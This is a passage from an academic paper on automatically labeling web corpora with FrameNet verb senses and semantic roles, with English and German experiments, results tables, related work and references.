0.572 0.639 0.707* 0.671 0.694 0.62* 0.655 FNFT-train 0.729 0.643 0.683 0.7 0.38 0.493 0.598 0.339 0.433 0.706 0.55 0.618 B-WaS XL 0.736 0.767* 0.751 0.686 0.619* 0.651 0.67* 0.699* 0.684 0.724 0.71* 0.717 U-WaS XL 0.668* 0.935* 0.78 0.63* 0.683* 0.656 0.642* 0.833* 0.725 0.667 0.849* 0.747 Table 4: VSD P, R, F1; * marks significant differences to the system trained on FNFT-train. MASC test set which shows high polysemy. Evaluating on the set difference between the sys- tems (test verbs that remain after the intersection is re- moved), we see that the lemma coverage of WaS XL is complementary to FNFT-train. The difference Dt is not empty for both systems, but the number of verbs that can be evaluated additionally for WaS XL is much larger than the one for FNFT-train. The proportion of instances only evaluated for a specific train set to all evaluated instances ranges between 11% and 48% for WaS XL, and between 5% and 30% for FNFT-train. Combining training data. The complementary nature of the sets led us to evaluate two combinations of training sets: U-WaS XL consists of the union of WaS XL and FNFT-train, B-WaS XL implements a backoff strategy and thus consists of FNFT-train and those instances of WaS XL whose lemmas are not contained in the intersection with FNFT-train (i.e., if FNFT-train does not contain enough senses for a lemma, supplement with WaS XL). The third block in Table 4 shows that precision is higher or not significantly lower for B-WaS XL compared to FNFT-train, recall and F1 are higher. U-WaS XL leads to higher recall compared to B- WaS XL, and allover highest F1. This proves that our automatically labeled corpus WaS XL is com- plementary to the manually labeled FNFT-train and contributes to a better coverage on diverse test sets. Multiword verbs. Our approach of training data generation also includes multiword verbs such as carry out. We treat those verb senses as additional senses of the head verb, for which we also create sense patterns, i.e., the sense for carry out is a specific sense of carry. As a result, we do not need to rely on additional multiword detection strategies for VSD. Our WaS XL contains more than 100,000 sense instances of 194 multiword verbs, of which 35 have multiple FrameNet senses. We specifically evaluated the performance of our VSD system on multiwords and their head verbs from MASC which contains 81 relevant sense instances. The precision is 0.66 com- pared to 0.59 when training on FNFT-train, at slightly higher coverage. While the test set is too small to provide significant results, there is an indication that the automatically labeled data also contribute to the disambiguation of multiword verbs. This analysis concludes our section on automatic sense labeling. In the next section, we will describe our method for automatically adding FrameNet role labels to the WaS-corpora. 4 Automatic Labeling for Semantic Roles In this section, we present our linguistically informed approach to the automated labeling of FrameNet roles in arbitrary text. Our method builds on the results of rich linguistic pre-processing including dependency parsing and uses role-level links in the LLR SemLink and the sense labels from section 3. First, a set of deterministic rules is applied to label syntactic argu- ments with VerbNet semantic roles. Then, we map the VerbNet semantic roles to FrameNet roles based on role-level links in SemLink and the automatically created sense labels. Step 2A: VerbNet role label transfer. Our precision-oriented deterministic rules build on the re- sults of linguistic pre-processing. Our pre-processing pipeline5 performs lemmatization, POS tagging, named-entity-recognition and parsing with the Stan- ford Parser (de Marneffe et al., 2006), as well as se- mantic tagging with WordNet semantic fields.6 Step 5We used the components from DKPro Core (Eckart de Castilho and Gurevych, 2014). 6We used the most-frequent-sense disambiguation heuristic which works well for the coarse-grained semantic types given by the WordNet semantic fields. Named-entity tags are also mapped 203 1 provides FrameNet sense labels for the target verbs. Dependency parsing annotates dependency graphs, linking a governor to its dependents within a sen- tence. Governors and dependents are represented by the heads of the phrases they occur in. For ver- bal governors, the dependency graphs correspond to predicate argument structures with the governor be- ing the predicate and the dependents corresponding to the argument heads. Our rules attach VerbNet role labels to dependent heads of their verbal governors. We can then derive argument spans by expanding the dependent heads by their phrases. The semantic role inventory as given by VerbNet is our label space Y (|Y |=28). Rule-based role labeling can be seen as label transfer where a corpus instance uj is given by the dependent of a verbal governor and its sentential context, including all linguistic annotations. Then ruj is compared to a prototypical attribute representation rxi of a semantic role, derived from linguistic knowledge.7 More specifically, we iterate over the collapsed dependencies annotated by the Stanford parser and apply a hierarchically organized chain of 57 rules to the dependents of all verbal governors. In this rule chain, Location and Time roles are assigned first, in case a dependent is a location or has the semantic field value time. Then, the other roles are annotated. This is done based on the dependency type in com- bination with named entity tags or semantic fields, either of the dependent or the verbal governor or both. An example rule is: for the dependency nsubj, the role Experiencer is annotated if the governor’s seman- tic field is perception or emotion, and the role Agent otherwise. This way, I in our example I feelFeeling strangely sad and low-spirited today is annotated with the Experiencer role. Some rules also check the semantic field of the de- pendent, e.g., the dependency prep with triggers the annotation of the role Instrument, if the dependent is neither a person nor a group. Often, it is not possible to determine a single VerbNet role based on the avail- able linguistic information (32 rules assign one role, 5 rules assign 2 roles, and 20 rules assign 3 roles), e.g., the distinction between Theme and Co-Theme to WordNet semantic fields. 7It took a Computational Linguist 3 days to develop the rules, using a sample of the VerbNet annotations on PropBank from SemLink as a development set. can not be made. In such cases, multiple roles are annotated, which are all considered in the subsequent Step 2B. Evaluated on a test sample of VerbNet an- notations on PropBank, the percentage of correctly annotated roles among all annotated roles is 96.8% – instances labeled with multiple roles are considered correct if the set of roles contains the gold label. The percentage of instances where a rule assigns at least one role was 77.4%. Step 2B: Mapping VerbNet roles to FrameNet roles. Finally, the annotated VerbNet roles are mapped to FrameNet roles using (i) the automati- cally annotated FrameNet sense and (ii) the SemLink mapping of VerbNet roles to FrameNet roles for this FrameNet sense (frame). The information on the FrameNet frame is crucial to constrain the one-to-many mapping of VerbNet roles to fine-grained FrameNet roles. For example, the VerbNet role Agent is mapped to a large number of different FrameNet roles across all frames. While the SemLink mapping allows unique FrameNet roles to be assigned in many cases, there are still a number of cases left where the rule-based approach annotates a set of FrameNet roles. Examples are Interlocutor 1 and Interlocutor 2 for the Discussion frame, or Agent and Cause for the Cause harm frame. For the former the distinction between the roles is arbitrary, while for the latter further disambiguation may be desired. As the SemLink mapping is not complete, our approach results in partially labeled data, i.e., a sentence may contain only a single predicate-role pair, even though other arguments of the predicate are present. Our experiments show that we can train semantic role classifiers successfully on partially labeled data. We used the training set from Das and Smith (2011) (annotated with FrameNet roles) as a devel- opment set. Evaluated on the test set from Das and Smith (2011), the percentage of correctly annotated roles among all annotated roles is 76.74%.8 4.1 Creating the role-labeled corpus We use the two sense-labeled corpora WaS XL and WaS L as input for the automatic role label trans- fer, creating role-labeled corpora WaSR XL and WaSR L. We distinguish two variants of these cor- 8As in Step 2A, instances labeled with a set of roles are considered correct if the set contains the gold label. 204 instances roles senses r/s i/r WaSR XL-uni 549,777 1,485 809 1.8 370 WaSR L-uni 34,678 968 597 1.6 36 WaSR XL-set 823,768 2,054 849 2.4 401 WaSR L-set 53,935 1,349 648 2.1 40 FNFT? 12,988 2,867 800 3.6 4.5 Table 5: Role statistics of automatically labeled corpora. pora, one that only contains those role instances with a unique role label, marked with the suffix -uni in Table 5, and one that additionally includes sets of labels, marked with the suffix -set. For WaSR XL, Step 2A results in 1.9 million ar- guments labeled with VerbNet roles. This number is reduced by 66% in Step 2B as a result of the in- complete mapping between VerbNet and FrameNet senses and roles in SemLink. Table 5 shows that the resulting corpora contain 34,000 (WaSR L-uni) and 549,000 (WaSR XL-uni) uniquely assigned role instances for the verbs in our test sets, a lot compared to the 13,000 instances in FNFT?, FNFT filtered by the 695 verbs in our four test sets. The counts are even higher for the corpora including sets of labels. Due to the sparse labeling approach, our WaSR cor- pora contain on average up to 1.8 roles per predicate, compared to an average of 3.6 roles per predicate in FNFT?. This number rises to 2.4 when instances with sets of labels are added. 4.2 Role classification experiments Role classification system. We trained a supervised system for semantic role classification as a log-linear model per verb-frame using the features described in Fürstenau and Lapata (2012). Note that we do not evaluate the task of argument identification. Argument identification is performed by our rule-based VerbNet role transfer and follows common syntactic heuristics based on dependency parsing. Following Zapirain et al. (2013), we specifi- cally consider the subtask of role classification, as we focus on the quality of our data on the semantic level. In this context it is important that the features of our role classifier do not use span information: they include lemma and POS of the argument head, its governing word, and the words right and left of the ar- gument head, the position of the argument relative to the predicate, and the grammatical relation between the argument head and the predicate. Pre-processing is the same as for VSD. Training and test data. We compare our role classifier trained on WaSR XL-(set/uni) and WaSR L-(set/uni) to the one based on FNFT-train. Test datasets are the same as for VSD, see Table 3. 4.3 SRL results and analysis Results on WaSR corpora. We evaluate P, R, and F1 on all frame-verb combinations for which there is more than one role in our training data. Training the system on WaSR XL-set and WaSR L-set include training instances with sets of role labels. Therefore, sets of role labels are among the predicted labels. In the evaluation, we count the label sets as correct if they contain the gold label. As expected, WaSR XL-set leads to higher preci- sion and recall than WaSR XL-uni, resulting from the larger role coverage in the training set, and the lenient evaluation setting, see Table 6. We skip the WaSR L-* corpora in Table 6, because the benefits of the strict filtering for the sense corpora do not carry over to the role-labeled corpora: scores are lower for WaSR L-* on all test sets because of a smaller number of role-labeled instances in the WaSR L-* corpora (see Table 5). Comparison to FNFT-train. Table 6 compares the results of WaSR XL-* to the system trained on FNFT-train. Note that we emulated the lenient eval- uation setting for FNFT-train by retrieving the label set Sl in WaSR XL-set for a label l predicted by the FNFT-train system and counting l as correct if any of the labels in Sl matches the gold label. We, however, did not find any difference to the regular evaluation; it appears that the labeling errors of the FNFT-train-based system are different from the label sets resulting from our labeling method. The precision for WaSR XL-uni matches the pre- cision for FNFT-train for the Semeval and Fate test sets (the difference is not significant). This is remark- able considering that only partially labeled data are available for training. For WaSR XL-set, the precision scores for Se- meval and Fate improve over the FNFT-train system, significantly for Fate. Recall of the WaSR corpora is significantly lower allover, as a result of the sparse, partial labeling and the lower role coverage of our automatically labeled corpora. 205 FNFT-test Fate MASC Semeval P R F1 P R F1 P R F1 P R F1 WaSR XL-uni 0.658* 0.333* 0.442 0.619 0.281* 0.387 0.652* 0.253* 0.365 0.689 0.394* 0.501 WaSR XL-set 0.705* 0.398* 0.509 0.733* 0.337* 0.462 0.648* 0.297* 0.408 0.722 0.441* 0.547 FNFT-train 0.741 0.831 0.783 0.652 0.642 0.647 0.724 0.527 0.61 0.705 0.625 0.663 B-WaSR XL-uni 0.728* 0.878* 0.796 0.645 0.698* 0.67 0.718 0.574* 0.638 0.696 0.71* 0.703 U-WaSR XL-uni 0.691* 0.883* 0.776 0.629 0.701* 0.663 0.677* 0.579* 0.624 0.671 0.721* 0.695 Table 6: Role classification P, R, F1; * marks significant differences to the system trained on FNFT-train. Figure 2: Role classification learning curves. Comparative analysis. We compare the perfor- mance of our WaSR XL-uni and the FNFT-train based system on the intersection of the evaluated senses between both systems. Precision of FNFT- train is higher on the intersection, except for Semeval, where it is similar. FNFT-train evaluates on average two more roles per sense than the WaSR. Evaluat- ing only on the difference, the instances not con- tained in the intersection, we see that WaSR XL-uni contributes some instances that are not covered by FNFT-train. These constitute between 7% and 18% of the total evaluated instances, compared to 26% to 50% instances added by FNFT-train. The precision of WaSR XL-uni on the intersection for MASC is high at 0.68, compared to 0.55 for FNFT-test (not shown in Table 6). These results indicate that our WaSR XL-uni is complementary to FNFT-train. Combining training data. To give further evi- dence of the complementary nature of the automati- cally labeled corpus, we run experiments that com- bine WaSR XL-uni with FNFT-train. We again use the union of the datasets (U-WaSR XL-uni) and back- ing off to WaSR XL-uni when FNFT-train does not provide enough roles for a sense (B-WaSR XL-uni). Table 6 shows better results for the backoff cor- pus than for the union. Recall is significantly higher compared to FNFT-train, and precision values are not significantly lower except for FNFT-test. This demonstrates that our automatically role-labeled cor- pora can supplement a manually labeled corpus and benefit the resulting system. WaSR sampling. Because our WaSR corpora show a Zipfian distribution of roles (there are a few roles with a very large number of instances), we ran- domly sample nine training sets from WaSR XL with a different maximal number of training instances per role s such that s = 5 · 2i for i ∈ {0, 1, .., 8}, i.e., s ranges from 5 to 1280. Fig. 2 shows the learning curves for precision on WaSR XL-*. It shows that distributional effects occur, i.e., that certain sample sizes s lead to higher precision for a test set than using the full corpus. The MASC test set particularly benefits from the sampling: combining FNFT-train with the best sample from the WaSR XL-set corpus (sampling 160 instances per role) results in the allover highest precision (0.738) and F1 (0.65). 5 German Experiments To show that our method generalizes to other lan- guages, we applied it to German data. We used the SALSA2 corpus (Burchardt et al., 2006) as a source of German data with FrameNet- like labels. As SALSA2 does not provide additional lexical unit examples, we split the corpus into a train- ing set S-train that is also used for the extraction of seed patterns, a development set S-dev, and a test set S-test. The proportion of train, development and test instances is 0.6, 0.2, 0.2; data statistics are shown in Table 7. The unlabeled corpus used is based on deWAC sections 1-5 (Baroni et al., 2009). VSD corpus and evaluation. The LLR used to generate more than 22,000 seed patterns consists 206 verbs senses roles inst(s) inst(r) S-test 390 684 1,045 3,414 8,010 S-dev 390 678 1,071 3,516 8,139 S-train 458 1,167 1,511 9460 22,669 WaS-de (t=0.07) 333 920 - 602,207 - WaSR-de-set 193 277 155 80,370 115,332 WaSR-de-uni 172 241 210 51,241 57,822 Table 7: German dataset statistics on verbs. of S-train and the German Wiktionary based on the linking by Hartmann and Gurevych (2013). DeWAC is labeled based on those patterns, and the thresholds t and f are determined in a VSD task on S-dev using a subset of the corpus based on sections 1-3. The threshold t=0.07 together with a discriminat- ing filter of f=0.07 result in the best precision, and t=0.07 in the best F1 score. Therefore, we perform extrinsic evaluation in a VSD task on S-test with WaS-de (t=0.07) and on the combinations U-WaS-de (union with S-train) and B-WaS-de (backoff-variant). The results in Table 8 show that the performance of the WaS-de-based system is worse than the S- train-based one, but the backoff version reaches best scores allover, indicating that our WaS-de corpora are complementary to S-train. P R F1 WaS-de 0.672* 0.912* 0.773 B-WaS-de 0.711 0.958* 0.816 U-WaS-de 0.676* 0.961* 0.794 S-train 0.707 0.946 0.809 Table 8: German VSD P, R, F1; * marks significant differ- ences to S-train. SRL corpus and evaluation. We adapt the rule- based VerbNet role-labeling to German dependencies from the mate-tools parser (Seeker and Kuhn, 2012), and perform Steps 2A and 2B on WaS-de, resulting in WaSR-de-set/uni (see Table 7). We train our role classification system on the cor- pora in order to evaluate them extrinsically. Training on WaSR-de-uni results in precision of 0.69 – better than for English, but still significantly lower than for the S-train system with 0.828. Recall is very low at 0.17. This is due to the low role coverage of the WaSR corpora shown in Table 7. The evaluation shows that our approach can be ap- plied to German. For VSD, the automatically labeled data can be used to improve on using S-train alone; improvements in precision are not significant, which has several potential causes, e.g., the smaller set of LLRs used for seed pattern extraction compared to English, and the smaller size of the resulting corpora. The smaller corpora also result in very low recall for the role classification. Future work could be to extend the German dataset by adding additional resources to the LLR, for in- stance GermaNet (Hamp and Feldweg, 1997). Ex- tending the SemLink mapping to frames unique to SALSA should additionally contribute to an im- proved role coverage. 6 Related Work Relevant related work is research on (i) the automatic acquisition of sense-labeled data for verbs, (ii) the au- tomatic acquisition of role-labeled data for FrameNet SRL, and (iii) approaches to FrameNet SRL using lexical resources and LLRs, including rule-based and knowledge-based approaches. Automatic acquisition of sense-labeled data. Most previous work on automatically sense-labeling corpora for WSD focussed on nouns and WordNet as a sense inventory, e.g., Leacock et al. (1998), Mi- halcea and Moldovan (1999), Martinez (2008), Duan and Yates (2010). In this section, we describe work that specifically considers verbs. Besides the already introduced work by Cholakov et al. (2014), which we extended by discriminating patterns and adapted to the FrameNet verb sense inventory, this includes work by Kübler and Zhekova (2009), who extract example sentences from several English dictionar- ies and various types of corpora, including web cor- pora. They use a Lesk-like algorithm to annotate target words in the extracted sentences with Word- Net senses and use them as training data for WSD. They evaluate on an all-words task and do not find performance improvements when training on the au- tomatically labeled data alone or on a combination of automatically labeled and gold data. Automatic acquisition of role-labeled data. Pre- vious work in the automatic acquisition of role- labeled data uses annotation projection methods, i.e., aligning a role-annotated sentence to a new sentence on the syntactic level and transferring the role anno- tations to the aligned words. 207 The goals of Fürstenau and Lapata (2012)’s work are most similar to our work. They perform an- notation projection of FrameNet roles for English verbs. For this, they pair sentences in the British Na- tional Corpus with frame-annotated sentences, align their syntactic structures (including arguments), and project annotations to the new sentences. They simu- late a “low-resource” scenario that only provides few training instances (called seed sentences) by vary- ing the number of seed sentences and added labeled sentences. They use the automatically labeled data together with seed training data to train a supervised system and find improvements over self-training. A main difference to our approach is that Fürstenau and Lapata (2012) do not use external information from LLRs or other lexical resources like WordNet. Like our approach, their approach creates a sparse labeling by a) discarding sentences that do not align well to their seeds, and b) discarding candidate pairs for which not all roles could be mapped. This leads to a high-precision approach that does not allow par- tially labeled data. Such an approach does have disad- vantages, e.g., a potentially lower domain variability of the corpus, since they only label sentences very similar to the seed sentences. Repeating their exper- iments for German, Fürstenau (2011) finds that the variety of the automatically annotated sentences de- creases when a larger expansion corpus is used. In our approach, the ASP patterns generalize from the seed sentences (cf. section 3), leading us to assume that our knowledge-based approach could be more generous with respect to such variability; we already successfully evaluated it on four datasets from vari- ous domains, but would like to further confirm our assumption in a direct comparison. Another approach for training data generation for PropBank-style semantic role labeling is described in Woodsend and Lapata (2014). Using comparable corpora they extract rewrite rules to generate para- phrases of the original PropBank sentences. They use a model trained on PropBank as the seed corpus to filter out noise introduced by the rewrite rules. A model trained on the extended PropBank corpus out- performs the state of the art system on the CoNLL- 2009 dataset. Recently, Pavlick et al. (2015) pre- sented a similar method to expand the FNFT corpus through automatic paraphrasing. Noise was filtered out using crowdsourcing and the resulting frame- labeled corpus showed a lexical coverage three times as high as the original FNFT. However, they did not evaluate the augmented corpus as training data for semantic role classification. FrameNet SRL using lexical resources. Simi- lar to our approach of automatically creating role- labeled data in section 4, there are other rule-based approaches to FrameNet SRL that rely on FrameNet and other lexical resources (Shi and Mihalcea, 2004; Shi and Mihalcea, 2005). Both describe a rule-based system for FrameNet SRL that builds on the results of syntactic parsing for the rule-based assignment of semantic roles to syntactic constituents. The role as- signment uses rules induced from the FrameNet full- text corpus. These rules encode sentence-level fea- tures of syntactic realizations of frames; they are com- bined with word-level semantic features from Word- Net including the countability of nouns or attribute relations of an adjective indicating which nouns it can modify. Since the coverage of the induced rules is low, they are complemented by default rules. The approach to SRL introduced by Litkowski (2010) uses a dictionary built from FrameNet fulltext annotations to recognize and assign semantic roles. Their system first performs frame disambiguation and then tries to match syntactic constituents produced by a parser with syntactic patterns included the gen- erated dictionary. Their system is evaluated on the SemEval-2 task for linking events and their partici- pants in discourse. It shows very low recall, which is mainly due to the low coverage of their FrameNet dictionary with regard to syntactic patterns. Our approach differs from previous rule-based ap- proaches to SRL in that we do not use the rule-based system directly, but use it to create labeled training data for training a supervised system. This transduc- tive semi-supervised learning setup should be able to deal better with the noise introduced by the rule based system than the inductive rule-based approaches. The work by Kshirsagar et al. (2015) uses lexi- cal resources to enhance FrameNet SRL. They also use the FrameNet sense examples and SemLink, but in a completely different manner. Regarding the sense examples, they employ domain adaptation tech- niques to augment the feature space extracted from the FrameNet training set with features from the sense examples, thereby increasing role labeling F1 by 3% compared to the baseline system SEMAFOR. 208 We use the FrameNet example sentences only indi- rectly: as seed sentences for the frame label transfer (cf. Step 1), they provide distant supervision for the automatic frame labeling. Our approach is comple- mentary to the one by Kshirsagar et al. (2015) who use the sense examples for role labeling. Kshirsagar et al. (2015) only briefly report on their experiments using SemLink. They used the transla- tion of PropBank labels to FrameNet in the SemLink corpus as additional training data, but found that this strategy hurt role labeling performance. They credit this to the low coverage and errors in SemLink, which might be amplified by the use of a transitive linking (from PropBank to FrameNet via VerbNet). In this work, we successfully employ SemLink: we use the VerbNet-FrameNet (sense- and role-level) linking from SemLink in our role label transfer approach (Step 2). The resulting automatically role-labeled training data improve role classification in combi- nation with the FN-train set (cf. section 4.3). We assume that the large-scale generation of training data smoothes over the noise resulting from errors in the SemLink mapping. Kshirsagar et al. (2015) additionally use features from PropBank SRL as guide features and exploit the FrameNet hierarchy to augment the feature space, a method complementary to our approach. Their best results combine the use of example sentences and the FrameNet hierarchy for feature augmenta- tion. They only evaluate on the FNFT-test set, as has become standard for FrameNet SRL evaluation. Our distantly supervised corpus might be useful for domain adaptation to other datasets, as our role clas- sification evaluation shows. According to our above analysis, our strategy is complementary to the approach by Kshirsagar et al. (2015). It would be interesting to evaluate to what de- gree our automatically labeled corpus would benefit their system. 7 Relation to FrameNet SRL In this section, we discuss the potential impact of our work to state-of-the-art FrameNet SRL. Our experimental setup evaluates frame disam- biguation and role classification separately, which is a somewhat artificial setup. We show that our automat- ically generated training data are of high quality and contribute to improved classification performance. This section motivates that the data can also be useful in a state-of-the-art SRL setting. For a long time, the SEMAFOR system has been the state-of-the-art FrameNet SRL system (Das et al., 2010; Das et al., 2014). Recently, systems were intro- duced that use new ways of generating training fea- tures and neural-network based representation learn- ing strategies. We already introduced (Kshirsagar et al., 2015). Hermann et al. (2014) use distributed representations for frame disambiguation. Others integrate features based on document-level context into a new open-source SRL system Framat++ (Roth and Lapata, 2015), or present an efficient dynamic program formalization for FrameNet role labeling (Täckström et al., 2015). They all report improve- ments on SEMAFOR results for full FrameNet SRL. Hermann et al. (2014) report state-of-the-art re- sults for FrameNet frame disambiguation. Their approach is based on distributed representations of frame instances and their arguments (embeddings) and performs frame disambiguation by mapping a new instance to the embedding space and assigning the closest frame label (conditioned on the the lemma for seen predicates). They report that they improve frame identification accuracy over SEMAFOR by 4% for ambiguous instances in the FNFT-test set, up to 73.39% accuracy. They also improve over the SE- MAFOR system for full SRL, reporting an F1 of 68.69% compared to 64.54% from Das et al. (2014). Our frame disambiguation results are not directly comparable to their results. We also evaluate on ambiguous instances, but only on verbal predicates, which are typically more polysemous than nouns and adjectives and more difficult to disambiguate. The currently best-performing FrameNet SRL sys- tem is the one presented by FitzGerald et al. (2015). They present a multitask learning setup for semantic role labeling which they evaluate for PropBank and FrameNet SRL. The setup is based on a specifically designed neural network model that embeds input and output data in a shared, dense vector space. Us- ing the frame identification model from Hermann et al. (2014), their results significantly improve on the previous state-of-the-art for full FrameNet SRL, reaching F1 of 70.9% on FNFT-test – but only when training the model jointly on FrameNet training data and PropBank-labeled data in a multitask setup. 209 FitzGerald et al. (2015) report that the perfor- mance of their system on FrameNet test data suffers from the small training set available – only training on FrameNet training data yields similar results to Täckström et al. (2015). The joint training setup does not benefit PropBank SRL due to the small size of the FrameNet training set in comparison to the PropBank data. This shows that additional training data for FrameNet, for instance our automatically labeled cor- pora, could also benefit a state-of-the-art system. An explicit evaluation of this assumption or comparison to this system is left to future work. Based on the discussion above, and on the frame and role classification experiments evaluated on four test sets, we expect that the data we generate with our method are complementary to the standard FrameNet training data and can be used to enhance state-of-the- art SRL systems. We leave empirical evaluation of this claim to future work. By publishing our auto- matically labeled corpora for research purposes, we support efforts by other researchers to analyze them and integrate them into their systems. 8 Discussion and Outlook The evaluation shows our purely knowledge-based approach for automatic label transfer results in high- quality training data for English SRL that is comple- mentary to the FNFT corpus. For VSD, our data lead to similar precision to a standard supervised setup, but at higher recall. Learn- ing curves indicate that with an even larger corpus we may be able to further improve precision. For role classification, the sparse labeling leads to a low role recall, but high precision is achieved for the cov- ered roles. One cause for the sparse labeling is the incomplete mapping between VerbNet and FrameNet roles in SemLink; in future work we would like to ex- tend the SemLink mapping automatically to enhance the coverage of our method, and to disambiguate ambiguous labels to further increase precision. As a knowledge-based approach, our method is particularly well-suited for languages and domains for which role-labeled corpora are lacking, but LLRs are available or can be created automatically. We therefore applied our approach to German data; the resulting sense-labeled corpus is complementary to the training data from SALSA2. The role classifica- tion evaluation should improve with a larger corpus. State-of-the-art SRL systems still rely on super- vised training, even when advanced methods such as deep learning are used. In section 7, we discussed in detail how our method relates to and comple- ments the most recent developments in FrameNet SRL. It would be interesting to evaluate the bene- fits that our automatically labeled data can add to an advanced SRL system. We expect particularly strong benefits in the context of domain adaptation: currently, FrameNet SRL systems are only evaluted on in-domain test data. Our method can be adapted to other sense and role inventories covered by LLRs (e.g., VerbNet and Prop- Bank) and to related approaches to SRL and semantic parsing (e.g., QA-SRL (He et al., 2015)); the latter requires a mapping of the role inventory to a suitable LLR, for instance mapping the role labels in QA-SRL to SemLink. We would also like to evaluate our ap- proach in comparison to other methods for training data generation, for instance methods based on align- ments (Fürstenau and Lapata, 2012), or paraphrasing (Woodsend and Lapata, 2014). 9 Conclusion We presented a novel approach to automatically generate training data for FrameNet SRL. It fol- lows the distant supervision paradigm and performs knowledge-based label transfer from rich external knowledge sources to large-scale corpora without relying on manually labeled corpora. By transferring labels to a large, diverse web- corpus (ukWAC) the potential of our approach for generating data for different domains becomes appar- ent. By applying it to German data, we showed that our approach is applicable across languages. As a further result of our work, we publish the automati- cally labeled corpora and release our implementation for knowledge-based role labeling (cf. Step 2A in section 4) as open source software. Automatic label transfer using linked resources has become popular in relation extraction (Mintz et al., 2009) and has been applied to VSD (Cholakov et al., 2014), but not to SRL. In this work, we showed that knowledge-based label transfer from LLRs to large-scale corpora offers great opportunities also for complex semantic tasks like SRL. 210 Acknowledgments This work has been supported by the German Re- search Foundation under grant No. GU 798/9-1, grant No. GU 798/17-1, and grant No. GRK 1994/1. We thank the action editors and anonymous review- ers for their thoughtful comments. Additional thanks go to Nancy Ide and Collin Baker for providing the MASC dataset. References Marco Baroni, Silvia Bernardini, Adriano Ferraresi, and Eros Zanchetta. 2009. The WaCky Wide Web: A Collection of Very Large Linguistically Processed Web- Crawled Corpora. Language Resources and Evalua- tion, 43(3):209–226. Jonathan Berant, Vivek Srikumar, Pei-Chun Chen, Abby Vander Linden, Brittany Harding, Brad Huang, Peter Clark, and Christopher D. Manning. 2014. Model- ing Biological Processes for Reading Comprehension. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 1499–1510, Doha, Qatar. Claire Bonial, Kevin Stowe, and Martha Palmer. 2013. Renewing and Revising SemLink. In Proceedings of the 2nd Workshop on Linked Data in Linguistics (LDL-2013): Representing and linking lexicons, termi- nologies and other language data, pages 9 – 17, Pisa, Italy. Aljoscha Burchardt and Marco Pennacchiotti. 2008. FATE: a FrameNet-Annotated Corpus for Textual En- tailment. In Proceedings of the Sixth International Conference on Language Resources and Evaluation (LREC’08), pages 539–546, Marrakech, Morocco. Aljoscha Burchardt, Kathrin Erk, Anette Frank, Andrea Kowalski, Sebastian Padó, and Manfred Pinkal. 2006. The SALSA Corpus: a German Corpus Resource for Lexical Semantics. In Proceedings of the 5th Interna- tional Conference on Language Resources and Evalua- tion (LREC 2006), pages 969–974, Genoa, Italy. Kostadin Cholakov, Judith Eckle-Kohler, and Iryna Gurevych. 2014. Automated Verb Sense Labelling Based on Linked Lexical Resources. In Proceedings of the 14th Conference of the European Chapter of the As- sociation for Computational Linguistics (EACL 2014), pages 68–77, Gothenburg, Sweden. Dipanjan Das and Noah A. Smith. 2011. Semi- Supervised Frame-Semantic Parsing for Unknown Pred- icates. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies, pages 1435–1444, Portland, Oregon, USA. Dipanjan Das, Nathan Schneider, Desai Chen, and Noah A. Smith. 2010. Probabilistic Frame-Semantic Parsing. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Asso- ciation for Computational Linguistics, pages 948–956, Los Angeles, CA, USA. Dipanjan Das, Desai Chen, André F. T. Martins, Nathan Schneider, and Noah A. Smith. 2014. Frame-Semantic Parsing. Computational Linguistics, 40(1):9–56. Marie-Catherine de Marneffe, Bill MacCartney, and Christopher D. Manning. 2006. Generating Typed Dependency Parses from Phrase Structure Parses. In Proceedings of the 5th Edition of the International Con- ference on Language Resources and Evaluation, pages 449–454, Genoa, Italy. Weisi Duan and Alexander Yates. 2010. Extracting Glosses to Disambiguate Word Senses. In Human Lan- guage Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguistics, HLT ’10, pages 627–635, Los Angeles, CA, USA. Richard Eckart de Castilho and Iryna Gurevych. 2014. A Broad-Coverage Collection of Portable NLP Com- ponents for Building Shareable Analysis Pipelines. In Proceedings of the Workshop on Open Infrastructures and Analysis Frameworks for HLT (OIAF4HLT) at COLING 2014, pages 1–11, Dublin, Ireland. Associ- ation for Computational Linguistics and Dublin City University. Parvin Sadat Feizabadi and Sebastian Padó. 2014. Crowd- sourcing Annotation of Non-Local Semantic Roles. In Proceedings of the 14th Conference of the European Chapter of the Association for Computational Linguis- tics, volume 2: Short Papers, pages 226–230, Gothen- burg, Sweden. Charles J. Fillmore, 1982. Linguistics in the Morning Calm, chapter Frame Semantics, pages 111–137. Han- shin Publishing Company, Seoul, South Korea. Nicholas FitzGerald, Oscar Täckström, Kuzman Ganchev, and Dipanjan Das. 2015. Semantic Role Labeling with Neural Network Factors. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 960–970, Lisbon, Portugal. Marco Fossati, Claudio Giuliano, and Sara Tonelli. 2013. Outsourcing FrameNet to the Crowd. In Proceedings of the 51st Annual Meeting of the Association for Com- putational Linguistics (Volume 2: Short Papers), pages 742–747, Sofia, Bulgaria. Hagen Fürstenau and Mirella Lapata. 2012. Semi- Supervised Semantic Role Labeling via Structural Alignment. Computational Linguistics, 38(1):135–171. Hagen Fürstenau. 2011. Semi-Supervised Semantic Role Labeling via Graph Alignment, volume 32 of 211 Saarbrücken Dissertations in Computational Linguis- tics and Language Technology. German Research Cen- ter for Artificial Intelligence and Saarland University, Saarbrücken, Germany. Mark Hall, Eibe Frank, Geoffrey Holmes, Bernhard Pfahringer, Peter Reutemann, and Ian H. Witten. 2009. The WEKA Data Mining Software: An Update. SIGKDD Explorations, 11(1):10–18. Birgit Hamp and Helmut Feldweg. 1997. GermaNet - a Lexical-Semantic Net for German. In Proceedings of the ACL workshop Automatic Information Extraction and Building of Lexical Semantic Resources for NLP Applications, pages 9–15, Madrid, Spain. Patrick Hanks. 2013. Lexical Analysis: Norms and Ex- ploitations. MIT Press, Cambridge, MA, USA. Silvana Hartmann and Iryna Gurevych. 2013. FrameNet on the Way to Babel: Creating a Bilingual FrameNet Using Wiktionary as Interlingual Connection. In Pro- ceedings of the 51st Annual Meeting of the Associa- tion for Computational Linguistics (ACL 2013), pages 1363–1373, Sofia, Bulgaria. Kazi Saidul Hasan and Vincent Ng. 2014. Why are You Taking this Stance? Identifying and Classifying Reasons in Ideological Debates. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 751–762, Doha, Qatar. Luheng He, Mike Lewis, and Luke Zettlemoyer. 2015. Question-Answer Driven Semantic Role Labeling: 